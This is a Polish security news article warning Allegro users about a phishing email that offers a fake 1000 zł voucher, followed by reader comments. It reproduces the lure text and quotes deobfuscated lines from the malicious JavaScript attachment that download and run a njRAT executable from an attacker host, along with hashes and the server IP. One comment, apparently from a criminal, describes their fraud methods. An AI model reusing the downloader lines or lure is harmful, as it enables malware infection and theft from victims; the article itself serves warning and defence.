11.11.2018 | 13:06

Adam Haertle

Uwaga na atak: Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

W ostatnich tygodniach widzimy znaczący wzrost ataków na użytkowników Allegro. Scenariuszy jest wiele – od wyłudzania haseł po instalację złośliwego oprogramowania. Poniżej opisujemy najnowszy pomysł internetowych oszustów.

Wśród setek złośliwych e-maili, które codziennie widzimy, przeważają wiadomości już dobrze nam znane. Wiele grup przestępców przez wiele tygodni, a czasem nawet miesięcy, wysyła identyczne e-maile z identycznymi załącznikami, nie starając się w ogóle zadbać o odświeżenie swojej oferty. Czasem jednak zdarzają się nowe inicjatywy, które warto opisać, by ostrzec internautów.

Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

Temat wiadomości pokazuje niechlujność atakujących – z reguły lepiej dbają o treść swoich ataków. Sama wiadomość wygląda następująco:

Witaj (tu adres odbiorcy),

Zgodnie z naszymi procedurami przyznalismy Tobie w ramach zwrotu, voucher na kwote 1.000zl do wydania w serwisie allegro.

twój kupon znajduje sie w zalaczniku!

Czekamy na Ciebie!

Do wiadomości dołączony jest plik

Karta Podarunkowa.z
d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf
https://www.virustotal.com/#/file/d67dfc63aba158632ab3987a80a8a05280f30ab1c9cab36c908df4e82e7dccaf/

zawierający w archiwum plik

zalacznik.PDF.js
6b7ba9765755d44c9f7d515502e65e15d95edea4997651288ff4b7d374792e3c
https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/

Złośliwy plik JS jest zaciemniony, ale daje się łatwo odczytać. Zawiera takie ciągi:

DfL('http://kapitanbomba.hopto.org/file.exe', foul + '\\file.exe');
DfLPDF('http://kapitanbomba.hopto.org/file.pdf', foul + '\\file.pdf');
RunExe();
RunPDF();

Plik PDF jest pusty i najwyraźniej niegroźny (zapewne ma udawać błędny załącznik), z kolei plik EXE jest pełny zła i zdecydowanie groźny:

file.exe
ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6
https://www.virustotal.com/#/file/ad5832056e4f94846d00b01fc6aec0163bb7f2c62c0a1cc384041941a5536cf6/

Jest to koń trojański znany jako njRAT lub Bladabindi. Korzysta z tego samego serwera, z którego jest pobierany:

kapitanbomba.hopto.org
108.62.118.179

Ataki z użyciem tego serwera i złośliwego oprogramowania prawdopodobnie trwają co najmniej od dwóch dni, jednak mała liczba zgłoszeń wskazuje, że jest to raczej kampania celowana w konkretne ofiary.

Dziękujemy Czytelnikom, którzy zgłosili kampanię – Ty też możesz pomóc!

Powrót

Komentarze

  • 2018.11.11 15:14 senoba

    Potwierdzam. Również otrzymałem taką wiadomość. Całkiem nieźle przygotowana. Sam się prawie złapałem.
    Mają skądś dane kont Allegro. Przyszło dziś na e-mail, którego używam jedynie do allegro. Na pozostałe ogólnodostępne konta nic nie wysłali.
    Precyzyjny atak.

    Odpowiedz
    • 2018.11.12 16:49 Mati

      Poważnie ? Musisz być chyba jednak debilem. Sorry ale od kiedy to allegro pisze do ciebie bez polskich znaków diakrytycznych ?
      Poza tym sekcja użyteczne informacje też daje dużo do myślenia. Z dwa błędy wyłapałem nie wczytując się w tekst. Literówki biją po oczach. Czy allegro nagle zatrudniło dziecko z 4 klasy podstawówki ?

      Odpowiedz
    • 2018.11.14 08:28 Mateusz

      Niekoniecznie z allegro. Przy zakupie twój adres dostaje sprzedawca, a wielu sprzedawców ma zintegrowany sklep z allegro. Albo któryś sprzedawca świadomie przekazał dane atakującym albo oni sami wykradli je z sklepu. Więc twój e-mail tylko do allegro wcale nie jest tylko do allegro, chyba że nic jeszcze nie kupiłeś.

      Odpowiedz
  • 2018.11.11 16:34 Imię

    Znowu chakerzy ofiary reformy edukacji w Polsce.

    Odpowiedz
  • 2018.11.12 06:15 gosc

    Jeśli to serwer DNS no.ip to może atakujący jeszcze raz się na nim zaloguje. Jeśli się zaloguje to może atakujący ma zmienne IP?
    Jeśli się nie zmieni w przeciągu miesiąca to może korzysta z jakiegoś hostingu? Może „Ubiquity Server Solutions Chicago” by coś więcej by powiedziało federalnym na temat IP?

    Odpowiedz
  • 2018.11.12 08:26 hmmm

    Haksior dysan112 włamuje się dzieciakom i starszym osobom na czatach i policja nie może z nim nic zrobić?

    Odpowiedz
    • 2018.11.12 13:08 dyson997

      >Miałem uruchomiony podsłuch w mini pc kiano slimstick, przez kilka miesięcy. Nie zorientowałem się że to małe urządzenie ma wbudowany mikrofon. Ten wbudowany antywirus w Windows 10 Defender i Avast niczego nie wykryły, dopiero inne programy wyłapały ponad 13 infekcji i trojanów. Jak się okazało mój prześladowca codziennie namierzał mnie na arabskim czacie zamtalk i tam zdobywał moje IP, prawdopodobnie złamał zabezpieczenia czata lub dostawał moje dane od zaprzyjaźnionego Pakistańczyka z którym grał w gry online. Zauważyłem, że chodzą w sieci za mną jakieś osoby po różnych, forach, portalach na których jestem i mam konto. Zaczęli tam tworzyć nicki z moim imieniem lub nazwą mojego nicka z innego forum, portalu. Podchodziło to już pod prześladowanie w sieci lub stalking. Raz bezczelnie napisał mi na priv, co wpisuje w google, co mówiłem w pokoju, prawdopodobnie przeglądał sobie mój pulpit, pisał to z nicka yumii. Powiedziałem, że mu nie odpuszczę i zacząłem go tropić, popytałem ludzi, połączyłem jego wpisy, poobserwowałem co pisze i odkryłem jego stały nick dysan112. Potem już wiedziałem co to za osoba i jaki to Windowsowy hakier. Także wiem, jak łatwo uruchomić pod Windowsem mikrofon, gdy ktoś wgra ci zdalnie trojana, ja nigdy nie wchodziłem w linki z czatów, a on jakimś sposobem podesłał mi trojana i przeglądał mój pulpit, uruchomił sobie mikrofon w tle. Dobrze, że nie miałem w tym PC kamerki, bo jeszcze ją by uruchomił.
      __________
      radzę ci złożyć wniosek o ściganie przestępstwa osobiście w prokuraturze. jak wysłałeś coś takiego mailem to policjant który go odebrał musiał mieć niezłą bekę

      Odpowiedz
      • 2018.11.13 12:17 Michael

        Tak z ciekawości, tego Kiano kupiłeś jako używkę czy całkowicie nowy komputer w sklepie? Robiłeś reinstalację systemu, czy jak go odpaliłeś tak nic na nim nie zmieniałeś/ nie konfigurowałeś?

        Odpowiedz
        • 2018.11.26 20:35 bochaz

          Kupiłem Kiano nowy, ale potem wgrałem Linux i za jakiś czas wgrałem oryginalny Windows 10, ponieważ on ma w swoim biosie wbudowany klucz aktywujący system. Nie mogłem tylko sterowników wgrać i chyba tam na tym forum winclub ktoś wysłał sterowniki na dysk online, a ja je pobrałem i zainstalowałem. Defender i Avast jest do niczego, one nic nie wykryją nawet przy skanowaniu plików.

          Odpowiedz
          • 2019.01.28 19:03 Number

            Cześć bochaz. Też padłem ofiarą dysana, czy mógłbyś skontaktować się ze mną przez email: ofiaradysa et mail.com

      • 2018.11.26 20:30 yhym

        O widzę, że dysan112 się przestraszył i próbuje mnie wykpić, że będą bekę mieli z moich zeznań. Nie bój się są dowody na wszystko zebrane. Nawet poszukał moich wypowiedzi to forum co podajecie zainfekowane sterowniki też zostanie uwzględnione.

        Odpowiedz
        • 2018.11.26 22:17 dyson997

          gdybym był tym przestępcą to radziłbym ci nasłać na siebie prokuraturę?
          twoje wypowiedzi znalazłem w kilka sekund po wpisaniu „dysan112” w wyszukiwarkę, osint to podstawa :)
          a to jak policjanci traktują nietypowe zgłoszenia to posłuchaj tutaj 12:10 https://www.youtube.com/watch?v=5QTY27ERXDg

          Odpowiedz
          • 2018.12.03 14:27 takk

            To wejdź na taki czat paltalk lub zamtalk na których on siedzi i napisz coś do niego, to zobaczysz jak szybko ci się włamie na komputer jeżeli masz Windows, bo on tam dostaje IP ludzi. Zaraz cie będzie sprawdzał kim jesteś.

  • 2018.11.12 11:30 rat

    kolezce chyba atak nie wyszedl 48/56 wynik av, ratami bawilem sie jak mialem 12 latek

    Odpowiedz
  • 2018.11.12 22:04 Michał

    Czy tytuł to nie powinna być: „Rekompensata”?

    Odpowiedz
    • 2018.11.13 02:15 oto

      Tytul bez polskich liter, a tekst artykulu juz tak.

      Odpowiedz
    • 2018.11.13 02:41 mariusz

      czytałeś artykuł?

      Odpowiedz
  • 2018.11.13 15:17 Lu

    A co to znaczy „Rekomenstana zwrot 1000zl jako zadoscuczynienie.”

    Odpowiedz
    • 2018.11.14 15:49 teoria z niebezpiecznika

      miejska legenda mówi że to specjalnie, żeby do następnej fazy ataku przeszły tylko nieogarnięte ofiary. bo jak inteligentna osoba pobierze plik exe i dopiero wtedy się zorientuje to większa szansa że zrobi aferę, crypt szybciej trafi na virustotala itd. ale to jakaś naciągana teoria, na miejscu przestępców nigdy bym z takich „metod” nie skorzystał

      Odpowiedz
  • 2018.11.14 09:40 Dziadu

    I to 'Tobie’ zamiast 'Ci’ od razu się rzuca w oczy.

    Odpowiedz
  • 2018.11.14 19:37 Hacker

    Jak czytam Wasze komentarze to, aż mi Was żal. Piszecie takie glupoty, aż w głowie się nie mieści. Plik ten uruchamiał czystego PDF’a, tylko po to aby coś się włączyło. W tle uruchamiało starter do njRAT’a. Wysyłamy te maile, że się tak wyrażę na kilogramy. Nie wiemy do kogo to idzie. Jak napatoczy się ofiara, sprawdzamy czy ma coś fajnego na komputerze, jeżeli tak przerzucamy na inne serwery i albo szyfrujemy pliki za okup, ewentualnie ściagamy wasze dokumenty tożsamości i sprzedajemy dalej. Czasem się trafi człowiek kret, który sam oddaje siano, np. józef który dzięki oknie czatu myślał że pisze z bankiem i zmienił numer tele do autoryzacji na nasz. Wyławiamy tylko najgłupszych. Pozdrawiam

    Odpowiedz
    • 2018.11.14 20:41 vv

      imponujące. ile zarabiacie? udało się kiedyś jakąś firmę, urząd czy tylko takie józefy?

      Odpowiedz
    • 2018.11.15 15:00 asd

      „imponujące” złodziejstwo i amatorka, pseudo haker z ciebie i żałosny typ skoro nie potrafisz zarobić fajnych pieniedzy z normalnego interesu. wystarczy jeden błąd i bedziesz siedział w pierdlu, minuta nieuwagi i braku koncentracji i pojdziesz siedziec na pare lat za tych wszystkich ludzi i życze ci tego jak najszybciej.

      Odpowiedz
  • 2018.11.20 16:20 mariaczi

    Droga redakcjo, poprawcie proszę literówki. Słownik języka polskiego nie zna „Rekomenstana” ;)
    Pozdrawiam!

    Odpowiedz
    • 2018.11.20 16:54 adamh

      Drogi Czytelniku, przeczytaj dokładnie artykuł. Albo chociaż pobieżnie.

      Odpowiedz

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uwaga na atak: Ticket #173 – Rekomenstana zwrot 1000zl jako zadoscuczynienie.

Komentarze